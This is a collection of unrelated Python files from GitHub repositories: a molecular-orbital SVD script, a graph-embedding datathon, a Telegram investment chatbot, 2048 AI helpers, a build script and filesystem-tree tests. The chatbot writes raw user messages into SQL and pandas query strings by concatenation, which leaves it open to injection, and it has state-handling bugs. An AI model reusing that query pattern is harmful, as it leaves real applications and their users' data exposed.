                            return MOCoeffA
            # Beta Case
            if (switch == -1):
                # Extract Beta MO coefficient
                with open(filename, 'r') as f:
                    for line in f:
                        if "Beta MO coefficients" in line:
                            for m in range(0, MOlines):
                                nextline = next(f)
                                nextline = nextline.split()
                                # print(nextline)
                                MOlistb.extend((nextline))
                            for i in MOlistb:
                                MOB.append(float(i))
                            # Reshape the array into NBasis by NBasis matrix
                            MOCoeffB = np.reshape(np.array(MOB), (NBasis, NBasis), order='F')
                            return MOCoeffB
        else:
            print('The file extension is not supported. This script only supports fchk and fmat.')


########################
#######################
##### AO OVERLAP ######
#######################
def FrmAOOverlap(A):
    CInv = np.linalg.inv(A)
    S = np.dot(np.transpose(CInv), CInv)
    return S


#######################
#####Sanity Checks#####
#######################
#MOCoeff =(MatGrab('H2.fmat',1))
#MOCoeffT=np.transpose(MOCoeff)
#AOOverlap=FrmAOOverlap(MatGrab("H2O.fmat",1))
#print ("MOCoeff")
#print (MOCoeff)
#print ("AO Overlap")
#print (AOOverlap)
## You should get IDENTITY matrix
#print ("CT.AOS.C")
#print((np.matmul(np.matmul((MOCoeffT),AOOverlapfc),MOCoeff)))


#########################################
######## EXAMPLE on H2 MOLECULE #########
#########################################
#
# Pulling the Coeff. from the first file
filename = sys.argv[1]
switch = int(sys.argv[2])
# you can have different files, but they should have same dimensions
filename2 = sys.argv[3]
switch2 = int(sys.argv[4])
MOCoeff1 = MatGrab(filename, switch)
#
# Pulling the Coeff. from the Second file
MOCoeff2 = MatGrab(filename2, switch2)
#
# Printing the coeff
print("###############################")
print("### MO COEFF. OF", filename, "###")
print("###############################")
#print(" MOCoeff. of ",filename)
print(MOCoeff1)
print("")
# Printing the coeff
print("###############################")
print("### MO COEFF. OF", filename2, "###")
print("###############################")
#print(" MOCoeff. of ",filename2)
print(MOCoeff2)
print("")
# Calculate the overlap between the two MOCoeffs.
# with and without the AO overlap
MOOverlap = np.matmul(np.transpose(MOCoeff1), MOCoeff2)
AOOverlap = FrmAOOverlap(MatGrab(filename, switch))
#MOOverlapS = np.matmul(np.matmul(np.transpose(MOCoeff1),AOOverlap),MOCoeff)
#
# Optional printing - uncomment it if needed
#print(" MO Overlap is ", MOOverlap)


######################################
###########CALCULATING SVD############
######################################
# A = U * SIGMA * VT
# VT = transpose(V)
# where SIGMA is an M-by-N diagonal matrix i.e is zero except for its
# min(m,n) diagonal elements, U is an M-by-M orthogonal matrix, and
# V is an N-by-N orthogonal matrix. The diagonal elements of SIGMA
# are the singular values of A; they are real and non-negative, and
# are returned in descending order. The first min(m,n) columns of
# U and V are the left and right singular vectors of A.
# SVD
print("#########################################")
print("###CALCULATING SVD USING MO-MO OVERLAP###")
print("#########################################")
print("")
U, s, VT = np.linalg.svd(MOOverlap)
print("######################")
print("###### U MATRIX ######")
print("######################")
print(U)
print("")
print("#############################")
print("### SIGMA DIAGONAL MATRIX ###")
print("#############################")
print(diag(s))
print("")
print("##########################")
print("### V-TRANSPOSE MATRIX ###")
print("##########################")
print(VT)
print("")
print("################")
print("### V MATRIX ###")
print("################")
print(np.transpose(VT))
print("")
# We can also reconstruct the matrix using the diagonal matrix
# First, form the diagonal matrix from s
Sigma = diag(s)
#print("sigma" ,Sigma)
#print("")
# Reconstruct the initial matrix
Reconstructed_MOOverlap = U.dot(Sigma.dot(VT))
#print("Reconstructed_MOOverlap", Reconstructed_MOOverlap)
#print(" ")
#print("MOOverlap is", MOOverlap)
```
{ "source": "AAbouzeid/RiceDatathonRepo22", "score": 3 }
#### File: AAbouzeid/RiceDatathonRepo22/datathon.py
```python
import csv
import numpy as np
import pandas as pd
from collections import defaultdict
from stellargraph.data import BiasedRandomWalk
from stellargraph import StellarGraph
from gensim.models import Word2Vec
import multiprocessing
import argparse


def train(p):
    file = open('bill_challenge_datasets/Training/training_graph.csv')
    csvreader = csv.reader(file)
    edges = []
    for row in csvreader:
        if row[0][0] != "n":
            edges.append(row)

    training_edges = []
    test_true_edges = []
    test_false_edges = []
    graph = defaultdict(set)
    training_graph = defaultdict(set)
    for i, row in enumerate(edges):
        if i % 10 == 0:
            test_true_edges.append(row)
        else:
            training_edges.append(row)
            training_graph[row[0]].add(row[1])
            training_graph[row[1]].add(row[0])
        graph[row[0]].add(row[1])
        graph[row[1]].add(row[0])

    for i in range(0, len(edges) - 65000, 2):
        if i % 2 == 0:
            if edges[i][0] not in edges[i + 1] and edges[i][0] not in graph[edges[i + 1][0]]:
                test_false_edges.append([edges[i][0], edges[i+1][0]])

    pdgraph = pd.DataFrame(
        {"source": [x[0] for x in training_edges], "target": [x[1] for x in training_edges]}
    )
    sgraph = StellarGraph(edges=pdgraph)
    print(sgraph.info())

    rw = BiasedRandomWalk(sgraph)
    walks = rw.run(
        nodes=list(sgraph.nodes()),  # root nodes
        length=100,  # maximum length of a random walk
        n=10,  # number of random walks per root node
        p=p,  # Defines (unormalised) probability, 1/p, of returning to source node
        q=1.0,  # Defines (unormalised) probability, 1/q, for moving away from source node
    )
    print("Number of random walks: {}".format(len(walks)))

    str_walks = [[str(n) for n in walk] for walk in walks]
    model = Word2Vec(str_walks, vector_size=20, min_count=0, sg=1, workers=multiprocessing.cpu_count(), epochs=3)

    best_acc = -1
    best_threshold = None
    for threshold_dist in [1, 2, 3, 4, 5, 6, 7]:
        amount_correct = 0
        amount_incorrect = 0
        for row in test_true_edges:
            try:
                # if distance less than threshold, we predict an edge
                if np.linalg.norm(model.wv[row[0]] - model.wv[row[1]]) < threshold_dist:
                    amount_correct += 1
                else:
                    amount_incorrect += 1
            except:
                continue
        for row in test_false_edges:
            try:
                # if distance less than threshold, we predict an edge
                if np.linalg.norm(model.wv[row[0]] - model.wv[row[1]]) < threshold_dist:
                    amount_incorrect += 1
                else:
                    amount_correct += 1
            except:
                continue
        acc = amount_correct / (amount_correct + amount_incorrect)
        if acc > best_acc:
            best_acc = acc
            best_threshold = threshold_dist
    print(f"Best Accuracy for p={p} it acc={best_acc} at threshold={best_threshold}")


def main():
    print("Starting")
    parser = argparse.ArgumentParser()
    parser.add_argument('p', action="store", metavar="<p>", help="")
    args = parser.parse_args()
    train(float(args.p))
```
{ "source": "aabraahaam/Chabot-TFM", "score": 3 }
#### File: aabraahaam/Chabot-TFM/tfm.py
```python
from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters,
                          ConversationHandler, RegexHandler)
import apiai, json
import sqlite3

updater = Updater(token='')
print("Connection to Telegram established; starting bot.")
dispatcher = updater.dispatcher

import telegram as tg
import pandas as pd

CHOOSING, CANTIDAD, OFICINA, FIN = range(4)

data = pd.read_csv("C:/Users/prueba/Downloads/Telegram Desktop/Productos.csv", sep=";")
columnas = ['id', 'edad', 'riesgo', 'cantidad', 'oficina']
df = pd.DataFrame(columns=columnas)

dictEdad = {"18-30": "¡Vaya jovencito! Ahora dime qué riesgo estás dispuesto a tomar.",
            "30-60": "MEdiana edad. Ahora dime qué riesgo estás dispuesto a tomar.",
            ">60": "La segunda juventud. Ahora dime qué riesgo estás dispuesto a tomar."}

dictRiesgo = {"Alto": "¡Vaya, veo que te va la marcha! Ahora dime qué cantidad te gustaría invertir.",
              "Medio": "Un punto medio, así me gusta. Ahora dime qué cantidad te gustaría invertir",
              "Bajo": "A mí también me gusta la tranquilidad. Ahora dime qué cantidad te gustaría invertir."}

dictCantidad = {"<5000": "Me gusta empezar con algo moderado. Dime, ¿Necesitarías una oficina para las gestiones?",
                "5000-20000": "Vaya, parece que quieres tomárte esto en serio. Dime, ¿Necesitarías una oficina para las gestiones?",
                ">20000": "Uuuf, veo que alguien ha trabajado duro y ahora está recogiendo los frutos. Dime, ¿Necesitarías una oficina para las gestiones?"}


def startCommand(bot, update, user_data):
    df.set_value(update.message.chat_id, 'id', update.message.chat_id)
    reply_keyboard = [['18-30', '30-60'], ['>60']]
    markup = tg.ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)
    bot.send_message(chat_id=update.message.chat_id, text="Tenemos que empezar por saber tu edad", reply_markup=markup)
    return CHOOSING


def riesgo_choice(bot, update, user_data):
    df.set_value(update.message.chat_id, 'edad', update.message.text)
    respuesta = dictEdad[update.message.text]
    reply_keyboard = [['Alto', 'Medio'], ['Bajo']]
    markup = tg.ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)
    bot.send_message(chat_id=update.message.chat_id, text=respuesta, reply_markup=markup)
    return CANTIDAD


def cantidad_choice(bot, update, user_data):
    df.set_value(update.message.chat_id, 'riesgo', update.message.text)
    respuesta = dictRiesgo[update.message.text]
    reply_keyboard = [['<5000', '5000-20000'], ['>20000']]
    markup = tg.ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)
    bot.send_message(chat_id=update.message.chat_id, text=respuesta, reply_markup=markup)
    return OFICINA


def oficina_choice(bot, update, user_data):
    df.set_value(update.message.chat_id, 'cantidad', update.message.text)
    respuesta = dictCantidad[update.message.text]
    reply_keyboard = [['Sí', 'No']]
    markup = tg.ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)
    bot.send_message(chat_id=update.message.chat_id, text=respuesta, reply_markup=markup)
    return final_choice


def final_choice(bot, update, user_data):
    df.set_value(update.message.chat_id, 'oficina', update.message.text)
    edad = df.query("id == " + str(update.message.chat_id) + "").iloc[0, 1]
    riesgo = df.query("id == " + str(update.message.chat_id) + "").iloc[0, 2]
    cantidad = df.query("id == " + str(update.message.chat_id) + "").iloc[0, 3]
    oficina = df.query("id == " + str(update.message.chat_id) + "").iloc[0, 4]
    respuesta = data.query("EDAD == '" + str(edad) + "' & RIESGO == '" + str(riesgo) + "' & OFICINA == '" + str(oficina) + "' & CANTIDAD == '" + str(cantidad) + "'").iloc[0, 0]
    respuesta = "Hemos consultado la base de datos y el producto que mejor se adapta a sus necesidades es el " + str(respuesta)
    bot.send_message(chat_id=update.message.chat_id, text=respuesta)
    return ConversationHandler.END


def done(bot, update, user_data):
    update.message.reply_text("I learned these facts about you:")
    return ConversationHandler.END


def textMessage(bot, update):
    cnx = sqlite3.connect("Conversaciones.db")
    cursor = cnx.cursor()
    request = apiai.ApiAI('').text_request()  # Token API to Dialogflow
    request.lang = 'es'  # In which language will the request be sent
    request.session_id = 'small-talk-63ecd'  # ID Sessions of the dialog (you need to learn the bot afterwards)
    request.query = update.message.text  # We send a request to the AI with a message from the user
    responseJson = json.loads(request.getresponse().read().decode('utf-8'))
    response = responseJson['result']['fulfillment']['speech']  # We parse JSON and pull out the answer
    # meter timestamp,update.message.text,response
    msgusuario = update.message.text
    numero = str(update.message.chat_id)
    cursor.execute("INSERT INTO chats2 (id,usuario,bot) VALUES ('" + numero + "','" + msgusuario + "', '" + response + "')")
    cnx.commit()
    # If there is an answer from the bot - we send it to the user, if not - the bot did not understand it
    if response:
        bot.send_message(chat_id=update.message.chat_id, text=response)
    else:
        bot.send_message(chat_id=update.message.chat_id, text='No te entiendo, recuerda que estoy aprendiendo')


conv_handler = ConversationHandler(
    entry_points=[CommandHandler('start', startCommand, pass_user_data=True)],
    states={
        CHOOSING: [RegexHandler('^(18-30|30-60|>60|)$', riesgo_choice, pass_user_data=True),
                   ],
        CANTIDAD: [MessageHandler(Filters.text, cantidad_choice, pass_user_data=True)
                   ],
        OFICINA: [MessageHandler(Filters.text, oficina_choice, pass_user_data=True)
                  ]
    },
    fallbacks=[RegexHandler('^(Sí|No|)$', final_choice, pass_user_data=True)]
)

text_message_handler = MessageHandler(Filters.text, textMessage)
dispatcher.add_handler(conv_handler)
dispatcher.add_handler(text_message_handler)
updater.start_polling(clean=True)
print('Ejecutando')
updater.idle()
```
{ "source": "aabs/edx-ai-week4-project", "score": 3 }
#### File: aabs/edx-ai-week4-project/Caching.py
```python
import itertools
from collections import namedtuple

import FastGrid
from Util import Util
from Grid_3 import Grid
from SafeDict import SafeDict

CacheEntry = namedtuple('CacheEntry', ['hash_key', 'str_repr', 'score', 'hit_count'])


class Cache:
    """Stores information about grids"""

    def __init__(self):
        self.cache = SafeDict([])

    def contains_key(self, k: int) -> bool:
        if self.cache[k] is not None:
            return True
        return False

    def __getitem__(self, cache_key):
        return self.cache[cache_key]

    def __setitem__(self, cache_key, value):
        self.cache[cache_key] = value


class GridCache(Cache):
    def contains_grid(self, g: FastGrid) -> bool:
        if self.cache[hash(g)] is not None:
            return True
        return False

    def __getitem__(self, g: FastGrid):
        return self.cache[hash(g)]

    def __setitem__(self, g: FastGrid, value):
        self.cache[hash(g)] = value
```
#### File: aabs/edx-ai-week4-project/CompositeCalculation.py
```python
import logging

from KernelCalculator import KernelCalculator
from UtilityCalculation import *

log = logging.getLogger('app' + __name__)


class CompositeUtilityCalculator(UtilityCalculator):
    def __init__(self):
        self.calculators = [
            (1.0, ClusterAnalysisCalculator()),
            (0.0, ConvolutionKernelCalculator()),
            (0.0, FreeSpaceCalculator()),
            (0.0, RoughnessCalculator()),
            (0.0, MonotonicityCalculator()),
            (0.0, MaxTileCalculator()),
            (0.0, Kernel2()),
            (0.0, KernelCalculator()),
            (0.0, ClusteringCalculator()),
            (0.0, MisplacedMaxTilePenalty()),
            (0.0, FastSnakeCalculator())
        ]
        log.debug("Composite Calculator.")

    def compute_utility(self, grid: FastGrid) -> float:
        r = 0.0
        for weight, calculator in self.calculators:
            if weight != 0.0:
                r += weight * calculator.compute_utility(grid)
        return r
```
#### File: aabs/edx-ai-week4-project/ConvolutionKernel.py
```python
from array import array


# take kernels in the form:
# [[a, b, c],
#  [d, e, f],
#  [g, h, i]]
# all elements are floats
# size must be 3x3
class ConvolutionKernel():
    def __init__(self, arr):
        if len(arr) != 3:
            raise ValueError("incorrectly sized kernel")
        for row in arr:
            if len(row) != 3:
                raise ValueError("incorrectly sized kernel")
        self._arr = arr

    def compute(self, g):
        r = array('f', [0.0] * 16)
        for y in range(4):
            for x in range(4):
                r[(y*4)+x] = self.compute_point(x, y, g)
        return r

    def compute_point(self, x, y, g):
        acc = 0.0
        for i in range(0, 3):  # the extra +1 is because the upper bound is not inclusive
            for j in range(0, 3):  # the extra +1 is because the upper bound is not inclusive
                v = self.img(x - 1 + i, y - 1 + j, g)
                w = self.krnl(i, j)  # no need to offset the kernel
                acc += (v * w)
        return acc

    def img(self, x, y, g):
        # check that we are not too far out of bounds
        if x < -1 or x > 4:
            raise ValueError("x too far out of bounds")
        if y < -1 or y > 4:  # I'm sorry
            raise ValueError("y too far out of bounds")
        # this ensures that off edge values are just copies of the nearest on-board neighbour
        if x < 0:
            x = 0
        if y < 0:
            y = 0
        if x > 3:
            x = 3
        if y > 3:
            y = 3
        return g[x, y]

    def krnl(self, x, y):
        # check that we are not too far out of bounds
        if x < 0 or x > 3:
            raise ValueError("x out of bounds")
        if y < 0 or y > 3:  # I'm sorry
            raise ValueError("y out of bounds")
        return self._arr[x][y]
```
#### File: aabs/edx-ai-week4-project/GameplayOptimisation.py
```python
import sys

from ABTestingBase import ABTestingBase
from CaptureOutput import CaptureOutput
from Displayer_3 import Displayer
from GameBuilder import GameBuilder
from LogDisplayer import LogDisplayer, CompositeDisplayer


class GameplayTests(ABTestingBase):
    def test_profile_game(self):
        sut = GameBuilder().with_displayer(CompositeDisplayer()).build()
        self.start_profiling()
        sut.start()
        self.stop_profiling()
        self.display_profiling_summary('tottime')
        self.display_profiling_summary('ncalls')

    def test_can_run_game(self):
        sut = GameBuilder().with_displayer(Displayer()).build()
        sut.start()

    def test_optimise_player_weights(self):
        results = []
        runs = 1
        for max_tile_weight in range(0, 50, 2):
            for roughness_weight in range(0, -50, -2):
                for free_space_weight in range(1, 10, 2):
                    for monotonicity_weight in range(1, 50, 2):
                        acc = 0.0
                        max_score = -1 * sys.maxsize
                        min_score = sys.maxsize
                        sol = [free_space_weight, monotonicity_weight, roughness_weight, max_tile_weight]
                        print("testing:\t%s" % (str(sol)))
                        for i in range(1, 1 + runs):
                            score = self.run_solution(sol)
                            acc += score
                            max_score = max(max_score, score)
                            min_score = min(min_score, score)
                            print("%d:\t%f" % (i, score))
                        avg_score = acc / runs
                        outcome = (avg_score, sol, max_score, min_score)
                        results.append(outcome)
                        self.display_result(outcome)
        sorted_results = sorted(results, key=lambda x: x[0])
        self.display_results(sorted_results)

    def run_solution(self, solution: list) -> int:
        self.suppress_output()
        sut = GameBuilder().build()
        sut.playerAI.set_weights(solution[0], solution[1], solution[2], solution[3])
        sut.start()
        self.allow_output()
        return sut.grid.getMaxTile()

    def display_results(self, rs: list):
        for r in rs:
            self.display_result(r)

    def display_result(self, r):
        print("%f:\t%s" % (r[0], r[1]))
```
{ "source": "aabs/edx-ai-week7-project", "score": 3 }
#### File: aabs/edx-ai-week7-project/io_handling.py
```python
import numpy as np
from matplotlib import pyplot as plt

from Perceptron import Perceptron


def open_input(input_file):
    fo = open(input_file, "r")
    return fo


def open_output(output_file):
    fo = open(output_file, "w")
    return fo


class Outputter:
    def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array):
        pass


class CompositeOutputter(Outputter):
    def __init__(self, outputters):
        super().__init__()
        self.outputters = outputters

    def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array):
        for outputter in self.outputters:
            outputter.process(p, data, expected_labels, labels)


class ConsoleOutputter(Outputter):
    def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array):
        print(p.weights)
        # print("Prediction " + str(p.predict(data)))
        # print("Actual " + str(labels))
        # print("Accuracy " + str(p.score(data, labels) * 100) + "%")

    def __init__(self):
        super().__init__()


class FileOutputter(Outputter):
    def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array):
        self.fo.write("%d, %d, %d\n" % (p.weights[1], p.weights[2], p.weights[0]))

    def __init__(self, file_path):
        super().__init__()
        self.fo = open_output(file_path)


class GraphOutputter(Outputter):
    def __init__(self):
        super().__init__()

    def process(self, p: Perceptron, data: np.array, expected_labels: np.array, labels: np.array):
        colormap = np.array(['r', 'k'])
        ixs = [0 if x == 1 else 1 for x in expected_labels]
        xs = data[:, [1]]
        ys = data[:, [2]]
        plt.scatter(xs.flatten(), ys.flatten(), c=colormap[ixs])
        w = p.weights
        xx = np.linspace(min(xs), max(xs))
        a = -w[1] / w[2]
        yy = a * xx - (w[0]) / w[2]
        plt.plot(xx, yy, 'k-')
        plt.show()
```
{ "source": "aabtop/platform_window", "score": 2 }
#### File: aabtop/platform_window/build.respire.py
```python
import copy
import os

import respire.buildlib.cc as cc
import respire.buildlib.modules as modules


def Build(registry, out_dir, platform, configured_toolchain, stdext_modules):
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)

    platform_window_modules = {}

    configured_toolchain.configuration.include_directories += [
        os.path.dirname(os.path.realpath(__file__)),
    ]

    if platform == 'win32':
        platform_window_build_kwargs = {
            'sources': [
                'platform_window_win32.cc',
                'include/platform_window/platform_window.h',
            ],
            'public_include_paths': [
                'include',
            ],
            'system_libraries': [
                'User32',
                'Gdi32',
            ]
        }
    elif platform == 'raspi':
        platform_window_build_kwargs = {
            'sources': [
                'platform_window_raspi.cc',
                'include/platform_window/platform_window.h',
            ],
            'public_include_paths': [
                'include',
            ],
            'system_libraries': [
                'brcmEGL',
                'brcmGLESv2',
                'bcm_host',
                'vcos',
                'vchiq_arm',
            ]
        }
    elif platform == 'linux':
        platform_window_build_kwargs = {
            'sources': [
                'platform_window_x11.cc',
                'include/platform_window/platform_window.h',
            ],
            'public_include_paths': [
                'include',
            ],
            'system_libraries': [
                'X11',
            ]
        }
    elif platform == 'jetson':
        # We use a stub window for Jetson because it follows the EGLDevice/EGLOutput
        # path, which doesn't have the concept of "window"s and doesn't go through
        # eglCreateWindowSurface.
        platform_window_build_kwargs = {
            'sources': [
                'platform_window_stub.cc',
                'include/platform_window/platform_window.h',
            ],
            'public_include_paths': [
                'include',
            ]
        }
    else:
        raise Exception('Unsupported platform: ' + str(platform))

    platform_window_build_kwargs['module_dependencies'] = [
        stdext_modules['stdext_lib'],
    ]

    export_configured_toolchain = copy.deepcopy(configured_toolchain)
    export_configured_toolchain.configuration.defines += (
        ['EXPORT_PLATFORM_WINDOW'])

    platform_window_module = modules.SharedLibraryModule(
        'platform_window', registry, out_dir, export_configured_toolchain,
        **platform_window_build_kwargs)
    platform_window_modules['platform_window'] = platform_window_module

    return platform_window_modules
```
{ "source": "AABur/python-immutable-fs-trees", "score": 3 }
#### File: python-immutable-fs-trees/test/test_fs.py
```python
from hexlet import fs


def test_is_directory():
    node = fs.mkdir('/')
    assert fs.is_directory(node)
    assert not fs.is_file(node)


def test_build():
    tree = fs.mkdir('/', [
        fs.mkdir('etc'),
        fs.mkdir('usr'),
        fs.mkfile('robots.txt'),
    ])
    expected = {
        'children': [
            {
                'children': [],
                'meta': {},
                'name': 'etc',
                'type': 'directory',
            },
            {
                'children': [],
                'meta': {},
                'name': 'usr',
                'type': 'directory',
            },
            {
                'meta': {},
                'name': 'robots.txt',
                'type': 'file',
            },
        ],
        'meta': {},
        'name': '/',
        'type': 'directory',
    }
    assert tree == expected


def test_get_name():
    file = fs.mkfile('robots.txt')
    dir = fs.mkdir('etc')
    assert fs.get_name(file) == 'robots.txt'
    assert fs.get_name(dir) == 'etc'


def test_get_meta():
    file = fs.mkfile('robots.txt', {'owner': 'root'})
    dir = fs.mkdir('etc')
    assert fs.get_meta(dir) == {}
    assert fs.get_meta(file).get('owner') == 'root'


def test_get_children():
    file = fs.mkfile('robots.txt')
    dir = fs.mkdir('/')
    tree = fs.mkdir('/', [
        fs.mkdir('etc'),
        fs.mkdir('usr'),
        fs.mkfile('robots.txt'),
    ])
    expected = [
        {
            'children': [],
            'meta': {},
            'name': 'etc',
            'type': 'directory',
        },
        {
            'children': [],
            'meta': {},
            'name': 'usr',
            'type': 'directory',
        },
        {
            'meta': {},
            'name': 'robots.txt',
            'type': 'file',
        },
    ]
    assert not fs.get_children(file)
    assert fs.get_children(dir) == []
    assert fs.get_children(tree) == expected


def test_flatten():
    assert fs.flatten([]) == []
    assert fs.flatten([
        1, 2,
        [3, 5],
        [[4, 3], 2],
    ]) == [1, 2, 3, 5, 4, 3, 2]
    assert fs.flatten([
        [1, [5], [], [[-3, 'hi']]],
        'string',
        10,
        [[[5]]],
    ]) == [1, 5, -3, 'hi', 'string', 10, 5]
    assert fs.flatten([
        1, 2,
        {'a': 1},
        [3, 5],
        2,
    ]) == [1, 2, {'a': 1}, 3, 5, 2]
```